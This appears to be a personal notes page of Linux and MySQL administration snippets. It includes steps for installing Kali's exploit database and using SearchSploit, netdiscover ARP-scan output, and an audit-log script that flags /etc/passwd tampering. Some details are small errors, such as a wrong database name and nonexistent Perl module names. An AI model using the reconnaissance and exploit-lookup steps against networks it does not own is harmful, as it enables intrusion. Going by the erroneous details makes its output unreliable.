/* Show privileges for all users */
mysql> SELECT User, Host, Super_priv, Create_user_priv, Grant_priv from mysql.user WHERE Create_user_priv = 'Y' AND Grant_Priv = 'Y';
+------------------+-----------+------------+------------------+------------+
| User             | Host      | Super_priv | Create_user_priv | Grant_priv |
+------------------+-----------+------------+------------------+------------+
| root             | localhost | Y          | Y                | Y          |
| debian-sys-maint | localhost | Y          | Y                | Y          |
+------------------+-----------+------------+------------------+------------+
2 rows in set (0.00 sec)

/* Select statements */
/* Ben, add lots of select examples here */
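The GRANT machinery above applied the other way round, as an added example that is not from the original notes: one account per job for the inventory database instead of GRANT ALL PRIVILEGES and root-run backups. The account names and passwords are placeholders.

```sql
-- Added example, not from the original notes. One account per job for the
-- inventory database instead of GRANT ALL or running everything as root.
-- Account names and passwords are placeholders; change them.

-- CGI / application account: row access to inventory.* only, from localhost
-- only. No DROP, no ALTER, no GRANT OPTION, and nothing on mysql.*.
CREATE USER 'inv_app'@'localhost' IDENTIFIED BY 'CHANGE-ME-app';
GRANT SELECT, INSERT, UPDATE, DELETE ON inventory.* TO 'inv_app'@'localhost';

-- Backup account for mysqldump: read-only. SELECT, LOCK TABLES, SHOW VIEW
-- and TRIGGER cover a plain schema-and-data dump of one database.
CREATE USER 'inv_backup'@'localhost' IDENTIFIED BY 'CHANGE-ME-backup';
GRANT SELECT, LOCK TABLES, SHOW VIEW, TRIGGER ON inventory.* TO 'inv_backup'@'localhost';

-- Export account for SELECT ... INTO OUTFILE: FILE is a global privilege
-- (it lets the account read and write files on the server host as the
-- mysqld user), so keep it off the application account and give it to a
-- dedicated one.
CREATE USER 'inv_export'@'localhost' IDENTIFIED BY 'CHANGE-ME-export';
GRANT SELECT ON inventory.* TO 'inv_export'@'localhost';
GRANT FILE ON *.* TO 'inv_export'@'localhost';

-- Verify each account shows exactly the grants above (plus USAGE ON *.*).
SHOW GRANTS FOR 'inv_app'@'localhost';
SHOW GRANTS FOR 'inv_backup'@'localhost';
SHOW GRANTS FOR 'inv_export'@'localhost';

-- Review: anything with global SUPER, GRANT OPTION or FILE rights besides
-- root and debian-sys-maint deserves a second look.
SELECT User, Host, Super_priv, Grant_priv, File_priv
FROM mysql.user
WHERE Super_priv = 'Y' OR Grant_priv = 'Y' OR File_priv = 'Y';
```

With these in place the backup line becomes `mysqldump -u inv_backup -p inventory > mysql-inventory-$(date +%F)-backup.sql` rather than a root login.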
The mysqlcheck client performs table maintenance: It checks, repairs, optimizes, or analyzes tables.
mysqlcheck uses the SQL statements CHECK TABLE, REPAIR TABLE, ANALYZE TABLE, and OPTIMIZE TABLE in a convenient way for the user.
If you do not name any tables following db_name or if you use the --databases or --all-databases option, entire databases are checked.
Ref. https://dev.mysql.com/doc/refman/8.0/en/mysqlcheck.html
To delete duplicate rows based on multiple columns:
ALTER IGNORE TABLE your_table ADD UNIQUE (field1,field2,field3);
You can also try this:
ALTER IGNORE TABLE users ADD UNIQUE(email, alt_email, mobile, alt_mobile);
This will go through the table, copy it over, ignoring any dups. I am, however, hesitant to say that it will properly handle NULLs in those columns.
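The same clean-up done with explicit queries instead of ALTER IGNORE, against the inventory table created earlier on this page, so the NULL question above is answered by inspection rather than guessed at. This is an added example, not from the original notes; the (mac, ip) key is an illustrative choice and the index name uq_inventory_mac_ip is made up.

```sql
-- Added example, not from the original notes. Targets the inventory table
-- created earlier on this page (id, ip, mac, ...). The (mac, ip) key is an
-- illustrative choice; the index name uq_inventory_mac_ip is made up.
-- Work on a copy first: CREATE TABLE inventorybackup LIKE inventory;
--                       INSERT INTO inventorybackup SELECT * FROM inventory;

-- 1. Show the duplicate groups before deleting anything. GROUP BY treats
--    NULLs as equal, so all rows with a NULL mac collapse into one group
--    here, whereas a UNIQUE index permits any number of NULLs. This is the
--    direct form of the "same total from both queries" check used above.
SELECT mac, ip, COUNT(*) AS total, MIN(id) AS keep_id,
       GROUP_CONCAT(id ORDER BY id) AS all_ids
FROM inventory
GROUP BY mac, ip
HAVING COUNT(*) > 1;

-- 2. List the "missing mac" rows separately so the clean-up does not
--    silently decide what NULL or '' means.
SELECT id, ip, name
FROM inventory
WHERE mac IS NULL OR mac = '';

-- 3. Remove every duplicate except the lowest id in each (mac, ip) group.
--    The self-join compares mac with =, so NULL macs never match and are
--    left untouched. ip uses <=> (MySQL's NULL-safe equality) because the
--    column is nullable and two rows with the same mac and no ip should
--    still count as one device.
DELETE a
FROM inventory a
JOIN inventory b
  ON a.mac = b.mac
 AND a.ip <=> b.ip
 AND a.id > b.id;

-- 4. Re-run step 1: it must return no rows. Then add the constraint without
--    IGNORE. Duplicate IPs across different MACs are still allowed, as the
--    notes require, and multiple NULL macs are still allowed by MySQL.
ALTER TABLE inventory ADD UNIQUE KEY uq_inventory_mac_ip (mac, ip);
```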
The following are some perl notes. These need to be moved to their own page.
Install cpanm to make installing other modules easier (you'll thank us later). You need to type these commands into a Terminal emulator (Mac OS X, Win32, Linux):
sudo cpan App::cpanminus
Now install any module you can find.
sudo cpanm Module::Name
$ sudo cpan install Net::CGI
install Net::DBI
or
$ sudo cpan Net::DNS
Cpanminus or cpanm is a cpan client to get, unpack, build and install modules from the CPAN repository. It is a standalone, dependency-free script that requires zero configuration. Many experienced Perl developers prefer cpanm over cpan.
The Contacts Database
The following was used to build the contacts database and table.
mysql> create database contacts;
mysql> use inventory;
mysql> CREATE TABLE contacts (
    id int not null auto_increment primary key,
    fname varchar(32),
    mi varchar(12),
    lname varchar(32),
    suffix varchar(12),
    email varchar(64),
    email2 varchar(64),
    textnum varchar(32),
    phone varchar(32),
    phone2 varchar(32),
    street varchar(64),
    city varchar(64),
    state varchar(25),
    zip varchar(16),
    groups varchar(1024),
    comments varchar(2048),
    datestamp date,
    timestamp time
);
This is a third way to loop through all of the posted vars. Can I use this example to get all the POSTed vars?
use CGI ':standard';
# Get me some vars
my @params = param();
my $APP_NAME = param('app_name');
my $APP_WEB_PORT = param('app_web_port');
my $APP_WEB_USER = param('app_web_user');
my $APP_WEB_PASS = param('app_web_pass');
my $DOWNLOAD_DIR = param('download_dir');
my $CONFIG_DIR = param('config_dir');
my $LIBRARY_DIR = param('library_dir');
my $TEMP_DOWNLOAD_DIR = param('temp_download_dir');
print "SERVER_SOFTWARE = $ENV{'SERVER_SOFTWARE'}\n";
print "SERVER_NAME = $ENV{'SERVER_NAME'}\n";
print "GATEWAY_INTERFACE = $ENV{'GATEWAY_INTERFACE'}\n";
print "SERVER_PROTOCOL = $ENV{'SERVER_PROTOCOL'}\n";
print "SERVER_PORT = $ENV{'SERVER_PORT'}\n";
print "SERVER_ROOT = $ENV{'SERVER_ROOT'}\n";
print "REQUEST_METHOD = $ENV{'REQUEST_METHOD'}\n";
print "HTTP_ACCEPT = $ENV{'HTTP_ACCEPT'}\n";
print "PATH_INFO = $ENV{'PATH_INFO'}\n";
print "PATH = $ENV{'PATH'}\n";
print "PATH_TRANSLATED = $ENV{'PATH_TRANSLATED'}\n";
print "SCRIPT_NAME = $ENV{'SCRIPT_NAME'}\n";
print "QUERY_STRING = $ENV{'QUERY_STRING'}\n";
print "QUERY_STRING_UNESCAPED = $ENV{'QUERY_STRING_UNESCAPED'}\n";
print "REMOTE_HOST = $ENV{'REMOTE_HOST'}\n";
print "REMOTE_IDENT = $ENV{'REMOTE_IDENT'}\n";
print "REMOTE_ADDR = $ENV{'REMOTE_ADDR'}\n";
print "REMOTE_USER = $ENV{'REMOTE_USER'}\n";
print "AUTH_TYPE = $ENV{'AUTH_TYPE'}\n";
print "CONTENT_TYPE = $ENV{'CONTENT_TYPE'}\n";
print "CONTENT_LENGTH = $ENV{'CONTENT_LENGTH'}\n";
print "DOCUMENT_ROOT = $ENV{'DOCUMENT_ROOT'}\n";
print "DOCUMENT_URI = $ENV{'DOCUMENT_URI'}\n";
print "DOCUMENT_NAME = $ENV{'DOCUMENT_NAME'}\n";
print "DATE_LOCAL = $ENV{'DATE_LOCAL'}\n";
print "DATE_GMT = $ENV{'DATE_GMT'}\n";
print "LAST_MODIFIED = $ENV{'LAST_MODIFIED'}\n";
# nano /etc/network/interfaces
Edit the file similar to the following:
auto eno1
iface eno1 inet static
    address 10.32.10.64
    netmask 255.255.255.0
    gateway 10.32.10.1
    dns-nameservers 8.8.8.8
    dns-nameservers 4.4.4.4
Save the file and then edit /etc/resolv.conf like this:
# nano /etc/resolv.conf
nameserver 8.8.8.8 # Replace with your nameserver ip
nameserver 4.4.4.4 # Replace with your nameserver ip
Restart the networking on your system with:
# systemctl restart network [On SystemD]
//myserver/myfolder /mnt/backup cifs credentials=/home/myfolder/.Smbcredentials
The .Smbcredentials file is:
contents of .Smbcredentials file:
username=myaccount
password=mypassword
domain=mydomain
Permissions on cred file:
$ sudo ls -l /etc/smb_credentials.txt
-rw-------. 1 root root 54 Mar 24 13:19 /etc/smb_credentials.txt
Change security type:
$ sudo mount -t cifs //172.16.1.5/myshare/ /mnt/myshare \
    -osec=ntlmv2,domain=MYDOMAIN,username=myusername,password=mypassword
if [ "`id -u`" -eq 0 ]; then
    PS1="\[\033[m\]|\[\033[1;35m\]\t\[\033[m\]|\[\e[1;31m\]\u\[\e[1;36m\]\[\033[m\]@\[\e[1;36m\]\h\[\033[m\]:\[\e[0m\]\[\e[1;32m\][\W]> \[\e[0m\]"
else
    PS1="\[\033[m\]|\[\033[1;35m\]\t\[\033[m\]|\[\e[1m\]\u\[\e[1;36m\]\[\033[m\]@\[\e[1;36m\]\h\[\033[m\]:\[\e[0m\]\[\e[1;32m\][\W]> \[\e[0m\]"
fi
RCol='\033[0m'
Gre='\033[32m'; Red='\033[31m'; Blu='\033[34m'; Yel='\033[33m';
# The backticked if/fi is evaluated each time the prompt is drawn, so the
# bracket colour reflects the exit status of the previous command.
PS1="${RCol}[\`if [ \$? = 0 ]; then echo "${Gre}"; else echo "${Red}"; fi\`\t\[${RCol}\] \[${Blu}\]\h\[${RCol}\] \[${Yel}\]\w\[${RCol}\]]\n$ "
.bashrc as of 12.20.2020 15:09:13
---Start---
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac

# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth

# append to the history file, don't overwrite it
shopt -s histappend

# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=10000
HISTFILESIZE=20000

# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize

# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar

# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"

# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi

# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color|*-256color) color_prompt=yes;;
esac

# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes

if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
        # We have color support; assume it's compliant with Ecma-48
        # (ISO/IEC-6429). (Lack of such support is extremely rare, and such
        # a case would tend to support setf rather than setaf.)
        color_prompt=yes
    else
        color_prompt=
    fi
fi

if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt

# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
    ;;
*)
    ;;
esac

# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    #alias dir='dir --color=auto'
    #alias vdir='vdir --color=auto'

    alias grep='grep --color=auto'
    alias fgrep='fgrep --color=auto'
    alias egrep='egrep --color=auto'
fi

# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'

# Add an "alert" alias for long running commands.  Use like so:
#   sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'

# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.

if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi

# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi

# Exit-status coloured prompt (the if/fi in backticks runs at prompt time)
RCol='\033[0m'
Gre='\033[32m'; Red='\033[31m'; Blu='\033[34m'; Yel='\033[33m';
PS1="${RCol}[\`if [ \$? = 0 ]; then echo "${Gre}"; else echo "${Red}"; fi\`\t\[${RCol}\] \[${Blu}\]\h\[${RCol}\] \[${Yel}\]\w\[${RCol}\]]\n$ "
The while loop runs forever. The for loop runs through each character of the string given in $chars. echo prints the character, followed by a carriage return \r, but without a linebreak (-n). -e forces echo to interpret escape sequences such as \r. There's a delay of 0.5 seconds between each change.
#!/bin/bash
chars="/-\|"
while :; do
  for (( i=0; i<${#chars}; i++ )); do
    sleep 0.5
    echo -en "${chars:$i:1}" "\r"
  done
done
Here's an example using \b, which tells the terminal emulator to move the cursor one column to the left, in order to keep overwriting the same character over and over.
#!/usr/bin/env bash
spinner() {
    local i sp n
    sp='/-\|'
    n=${#sp}
    printf ' '
    while sleep 0.1; do
        printf "%s\b" "${sp:i++%n:1}"
    done
}

printf 'Doing important work '
spinner &
sleep 10    # sleeping for 10 seconds is important work
kill "$!"   # kill the spinner
printf '\n'
Add the Kali repository
First update the apt database
Get the Kali key
wget 'https://archive.kali.org/archive-key.asc'
Then add it to my system
Run another update, but do not run the upgrade at this point.
Now we need to set the correct priority for packages from the Kali Linux repositories: they will have a lower priority than the others. As a result, Kali Linux packages (for example, kernels) will not be installed automatically, but you can still install any package you need manually.
sudo sh -c "echo 'Package: *'>/etc/apt/preferences.d/kali.pref; echo 'Pin: release a=kali-rolling'>>/etc/apt/preferences.d/kali.pref; echo 'Pin-Priority: 50'>>/etc/apt/preferences.d/kali.pref"
Update again
sudo apt update
The problem is that some Kali packages have dependencies which are present in the Kali Linux repositories, but something prevents apt from installing them.
Therefore, to install Kali Linux packages, we will use aptitude in a command of the form:
sudo aptitude install -t kali-rolling PACKAGE-NAME
sudo aptitude install -t kali-rolling exploitdb-papers
It is not recommended to install drivers and kernel modules from the Kali Linux repository
sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"
https://miloserdov.org/?p=3609
To install:
sudo apt update && sudo apt -y install exploitdb
Note that the exploits are in /opt/exploitdb/
Regardless of how you installed SearchSploit, all you need to do in order to update it is run the following:
$ searchsploit -u
Do not use abbreviations.
Use the -p option to get more info about a specific exploit and to copy the path to the clipboard
Use the -m parameter to copy an exploit to the current directory.
Use the -w parameter to list the URL to the exploits.
$ netdiscover -i eno1
$ sudo netdiscover -h
Netdiscover 0.3-pre-beta7 [Active/passive arp reconnaissance tool]
Written by: Jaime Penalba <jpenalbae@gmail.com>

Usage: netdiscover [-i device] [-r range | -l file | -p] [-m file] [-s time] [-n node] [-c count] [-f] [-d] [-S] [-P] [-c]
  -i device: your network device
  -r range: scan a given range instead of auto scan. 192.168.6.0/24,/16,/8
  -l file: scan the list of ranges contained into the given file
  -p passive mode: do not send anything, only sniff
  -m file: scan the list of known MACs and host names
  -F filter: Customize pcap filter expression (default: "arp")
  -s time: time to sleep between each arp request (milliseconds)
  -n node: last ip octet used for scanning (from 2 to 253)
  -c count: number of times to send each arp reques (for nets with packet loss)
  -f enable fastmode scan, saves a lot of time, recommended for auto
  -d ignore home config files for autoscan and fast mode
  -S enable sleep time supression between each request (hardcore mode)
  -P print results in a format suitable for parsing by another program
  -N Do not print header. Only valid when -P is enabled.
  -L in parsable output mode (-P), continue listening after the active scan is completed

If -r, -l or -p are not enabled, netdiscover will scan for common lan addresses.
[13:57:07 benb ~/CCCC/Tech/PluggedIn] $ sudo netdiscover
[sudo] password for ben:
 Currently scanning: 192.168.76.0/16   |   Screen View: Unique Hosts

 10 Captured ARP Req/Rep packets, from 9 hosts.   Total size: 510
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.94    bc:a5:11:99:2e:38      1      42  Unknown vendor
 192.168.1.65    a4:8d:3b:1f:e8:53      1      60  Vizio, Inc
 192.168.1.70    5c:87:9c:7b:3d:6f      1      60  Unknown vendor
 192.168.1.68    d8:31:34:68:77:af      1      42  Unknown vendor
 192.168.1.154   c8:52:61:97:05:b2      1      60  Unknown vendor
 192.168.1.135   7c:dd:90:eb:f3:2e      1      60  Shenzhen Ogemray Technology Co., Ltd.
 192.168.1.150   7c:dd:90:eb:f3:2e      1      60  Shenzhen Ogemray Technology Co., Ltd.
 192.168.1.148   00:13:46:e4:48:61      1      42  D-Link Corporation
 192.168.1.254   c8:52:61:97:05:b0      2      84  Unknown vendor
sudo -H -u otheruser bash -c 'echo "I am $USER, with uid $UID"'
sudo -H -u mysql bash -c 'cat myfile.txt'
sudo -H -u clamav bash -c 'ls -tor'
sudo -H -u backup bash -c 'ls /sbin'
# select mac, COUNT(*) from inventory group by mac ;
# select ip, COUNT(*) from inventory group by ip ;
# select ip, COUNT(*) from inventory group by ip HAVING COUNT(*) >= 1 order by count(*);
# select ip, COUNT(*) from inventory group by ip having COUNT(*) >= 1 ;
Cisco Transceiver MGE Form-Factor Pluggable (SFP) Interface Converter
The Cisco MGBSX1 Transceiver MGE Small Form-Factor Pluggable (SFP) or mini Gigabit Interface Converter (mini-GBIC) is an easy-to-install module that provides a simple way to add fiber connectivity to Cisco 100, 200, 300, and 500 Series switches. The MGBSX1 transceiver is available for single-mode or multimode fiber-optic cabling and can support distances from 100 meters up to 40 kilometers.
Cisco MGBSX1 SFP Transceiver, Gigabit Ethernet (GbE) 1000BASE-SX Mini-GBIC (MGBSX1) at Amazon
When apt update throws errors like:
GPG error: http://dl.google.com/linux/earth/deb stable Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 78BD65473CB3BD13
Use the following to update/sign the keys in question:
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 648ACFD622F3D138
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 78BD65473CB3BD13
There are many ways of installing CPAN modules but the easiest is to use cpanm. If you are going to be working with Perl, you really should install it:
sudo apt-get install cpanminus
Then, install your module:
cpanm Net::Pcap
Alternatively, you can install with:
perl -MCPAN -e 'install Net::Pcap'
$ tcpstat -h
tcpstat version 1.5
usage: tcpstat [-?haeFlp] [-b bps] [-B bps] [-f filter expr] [-i interface] [-o output] [-R seconds] [-r filename] [-s seconds] [interval]
  -?, -h          - display this help
  -a              - accounting mode
  -b bps          - bandwidth mode, where bps is bits/second
  -B bps          - dumb bandwidth mode, where bps is bits/second
  -e              - do not print empty intervals
  -F              - flush stdout after printing each line
  -f filter expr  - packet filter expression (like in tcpdump)
  -i interface    - do live capture on [interface], not from file
  -l              - include linklayer in packet size calc
  -o output       - format for the output of stats (see manpage)
  -p              - non-promiscuous mode when doing live capture
  -R seconds      - display time relative to [seconds]
  -r filename     - read data from [filename]
  -s seconds      - capture only [seconds] long (-1 is infinite)
  interval        - time interval (seconds) for taking samples
$ msend -h
msend version 2.3
Usage:  msend [-g GROUP] [-p PORT] [-join] [-i ADDRESS] [-t TTL] [-P PERIOD] [-text "text"|-n]
        msend [-v | -h]
  -g GROUP     IP multicast group address to send to. Default: 224.1.1.1
  -p PORT      UDP port number used in the multicast packets. Default: 4444
  -i ADDRESS   IP address of the interface to use to send the packets. The default is to use the system default interface.
  -join        Multicast sender will join the multicast group. By default a sender never joins the group.
  -P PERIOD    Interval in milliseconds between packets. Default 1000 msec
  -t TTL       The TTL value (1-255) used in the packets. You must set this higher if you want to route the traffic, otherwise the first router will drop the packets! Default: 1
  -text "text" Specify a string to use as payload in the packets, also displayed by the mreceive command. Default: empty
  -n           Encode -text argument as a number instead of a string.
  -v           Print version information.
  -h           Print the command usage.

$ mreceive -h
mreceive version 2.3
Usage:  mreceive [-g GROUP] [-p PORT] [-i ADDRESS] ... [-i ADDRESS] [-n]
        mreceive [-v | -h]
  -g GROUP     IP multicast group address to listen to. Default: 224.1.1.1
  -p PORT      UDP port number used in the multicast packets. Default: 4444
  -i ADDRESS   IP addresses of one or more interfaces to listen for the given multicast group. Default: the system default interface.
  -n           Interpret the contents of the message as a number instead of a string of characters. Use this with msend -n.
  -v           Print version information.
  -h           Print the command usage.
$ sudo perl igmp-querier.pl
Sending querier packet
cat /var/log/igmp.log
auditd notes
sudo apt-get install auditd
sudo chkconfig auditd on
sudo vi /etc/audit/audit.rules
sudo service auditd restart
The following command lists the audit events in which /etc/passwd was accessed by anyone. With the example audit configuration referred to above (a watch on /etc/passwd), auditd records when /etc/passwd is modified or its permissions are tampered with using chmod.
sudo ausearch -f /etc/passwd
sudo auditctl -l
aureport --help
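ausearch -f only lists the raw records; deciding which of them matter still has to be done by hand. The following is an added Python example (not code from these notes or from the audit package) that groups raw /var/log/audit/audit.log records by event serial, summarises the events that touched /etc/passwd the way ausearch -f does, and flags the ones worth a second look. It assumes a watch rule such as `-w /etc/passwd -p wa -k passwd_changes` in audit.rules and an x86_64 syscall table; the log excerpt, key names and uid values are constructed.

```python
import re
from collections import defaultdict

# key=value tokens; values may be double-quoted ("vi", "/etc/passwd") or bare.
TOKEN = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Every record belonging to one event carries the same msg=audit(<epoch>:<serial>) stamp.
MSG = re.compile(r'msg=audit\((\d+\.\d+):(\d+)\)')
# x86_64 syscall numbers a "-p wa" watch on /etc/passwd typically produces.
SYSCALL_NAMES = {2: "open", 257: "openat", 82: "rename", 264: "renameat",
                 90: "chmod", 268: "fchmodat", 92: "chown", 260: "fchownat"}

# Constructed audit.log excerpt (not from the notes), as written by a rule like
#   -w /etc/passwd -p wa -k passwd_changes
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1617720001.101:1001): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=5617c0 a2=241 a3=1b6 items=2 ppid=2100 pid=2155 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=3 comm="vi" exe="/usr/bin/vi" key="passwd_changes"
type=CWD msg=audit(1617720001.101:1001): cwd="/root"
type=PATH msg=audit(1617720001.101:1001): item=0 name="/etc/" inode=2 dev=fd:00 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT
type=PATH msg=audit(1617720001.101:1001): item=1 name="/etc/passwd" inode=1337 dev=fd:00 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=SYSCALL msg=audit(1617720042.550:1002): arch=c000003e syscall=268 success=yes exit=0 a0=ffffff9c a1=7ffd0 a2=1b6 a3=0 items=1 ppid=3000 pid=3004 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts1 ses=5 comm="chmod" exe="/usr/bin/chmod" key="passwd_changes"
type=CWD msg=audit(1617720042.550:1002): cwd="/home/user"
type=PATH msg=audit(1617720042.550:1002): item=0 name="/etc/passwd" inode=1337 dev=fd:00 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=SYSCALL msg=audit(1617720090.007:1003): arch=c000003e syscall=257 success=yes exit=3 a0=ffffff9c a1=5617c0 a2=241 a3=1b6 items=1 ppid=3100 pid=3133 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=3 comm="vi" exe="/usr/bin/vi" key="group_changes"
type=PATH msg=audit(1617720090.007:1003): item=0 name="/etc/group" inode=1338 dev=fd:00 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
type=SYSCALL msg=audit(1617720133.420:1004): arch=c000003e syscall=257 success=no exit=-13 a0=ffffff9c a1=5617c0 a2=241 a3=1b6 items=1 ppid=4000 pid=4021 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts2 ses=7 comm="bash" exe="/usr/bin/bash" key="passwd_changes"
type=PATH msg=audit(1617720133.420:1004): item=0 name="/etc/passwd" inode=1337 dev=fd:00 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL
"""


def parse_records(lines):
    """Group raw audit records by event serial: {serial: {"time": epoch, "records": [fields]}}."""
    events = defaultdict(lambda: {"time": None, "records": []})
    for line in lines:
        m = MSG.search(line)
        if not m:
            continue  # blank line or something that is not an audit record
        fields = {k: v.strip('"') for k, v in TOKEN.findall(line)}
        ev = events[int(m.group(2))]
        ev["time"] = float(m.group(1))
        ev["records"].append(fields)
    return dict(events)


def path_events(events, path="/etc/passwd"):
    """One summary per event whose PATH records include `path` (what ausearch -f shows),
    in serial order. Events without a SYSCALL record are skipped."""
    out = []
    for serial in sorted(events):
        recs = events[serial]["records"]
        if path not in {r.get("name") for r in recs if r.get("type") == "PATH"}:
            continue
        sc = next((r for r in recs if r.get("type") == "SYSCALL"), None)
        if sc is None:
            continue
        nr = int(sc.get("syscall", -1))
        out.append({"serial": serial, "time": events[serial]["time"],
                    "syscall": SYSCALL_NAMES.get(nr, str(nr)),
                    "success": sc.get("success") == "yes",
                    "auid": int(sc["auid"]), "uid": int(sc["uid"]),
                    "comm": sc.get("comm"), "exe": sc.get("exe"), "key": sc.get("key")})
    return out


def flag_suspicious(summaries, admin_auids=(0,),
                    expected_comms=("vi", "vim", "useradd", "usermod", "userdel", "passwd", "chpasswd")):
    """Return [(serial, [reasons])] for events worth a second look. auid is the user who
    logged in and survives su/sudo, so auid != uid means the action ran with escalated
    privileges from that login; failed attempts are reported as well."""
    flagged = []
    for s in summaries:
        reasons = []
        if s["auid"] not in admin_auids:
            reasons.append("login user auid=%d is not an admin" % s["auid"])
        if s["auid"] != s["uid"]:
            reasons.append("escalated: auid=%d acted as uid=%d" % (s["auid"], s["uid"]))
        if s["comm"] not in expected_comms:
            reasons.append("unexpected program %s (%s)" % (s["comm"], s["exe"]))
        if not s["success"]:
            reasons.append("attempt failed (%s)" % s["syscall"])
        if reasons:
            flagged.append((s["serial"], reasons))
    return flagged


if __name__ == "__main__":
    for serial, reasons in flag_suspicious(path_events(parse_records(SAMPLE_LOG.splitlines()))):
        print(serial, "; ".join(reasons))
```

On a real host, feed it `open("/var/log/audit/audit.log")` instead of SAMPLE_LOG; the same grouping works for any other watched path via the `path` argument.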
First of all, you can filter an input pcap file based on start time and/or end time. -A <start-time> and -B <end-time> options are used to capture only those packets whose arrival time falls within a specific time range (e.g., between 2:30pm and 2:35pm). The time format to use is YYYY-MM-DD HH:MM:SS.
$ editcap -A '2014-12-10 10:11:01' -B '2014-12-10 10:21:01' input.pcap output.pcap
editcap can be also useful if you want to split a large pcap file into multiple smaller pcap files.
To split a pcap file into multiple pcap files of the same packet count:
$ editcap -c <packets-per-file> <input-pcap-file> <output-prefix>
Each output pcap file will have the same packet count, and be named as <output-prefix>-NNNN.
Example 6: Extract packets between a specific time period using options -A and -B
This example creates output_dump, which contains the packets captured between the time given in option -A and the time given in option -B.
# editcap -v -A "2009-02-11 11:26:30" -B "2009-02-11 11:27:00" input_dump output_dump
# editcap -v -A "2021-03-28 11:55:00" -B "2021-03-28 12:15:00" 032821.1206.cap 032821.1206.Slice.1155-1215.cap
Example 10: Divide the input_dump file into multiple files using option -c
Divide the single dump into multiple files, each containing the specified number of packets.
# editcap -v -c 1000 input_dump output
To ensure all timestamps are in strict chronological order:
editcap -S 0 capture.pcapng adjusted.pcapng
To remove duplicate packets seen within the prior four frames use:
editcap -d capture.pcapng dedup.pcapng
To remove duplicate packets seen within the prior 100 frames use:
editcap -D 101 capture.pcapng dedup.pcapng
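The time slicing, packet-count splitting and duplicate removal above are simple enough to reimplement directly on the pcap format, which is a handy way to check what editcap is doing to a capture. This is an added Python example, not code from these notes or from Wireshark: a minimal reader/writer for classic libpcap (not pcapng) with those three operations and a constructed five-packet capture. Timestamps are treated as UTC here (editcap uses local time) and the <prefix>-NNNNN output naming is this example's own.

```python
import struct
from datetime import datetime, timezone

# Classic libpcap layout: a 24-byte global header, then per packet a 16-byte
# record header (ts_sec, ts_usec, incl_len, orig_len) followed by the bytes.
GLOBAL_HDR = "IHHiIII"
PKT_HDR = "IIII"
LINKTYPE_ETHERNET = 1


def read_pcap(data):
    """Parse an in-memory classic pcap into [(ts_sec, ts_usec, packet_bytes), ...]."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic == 0xA1B2C3D4:
        e = "<"  # written little-endian
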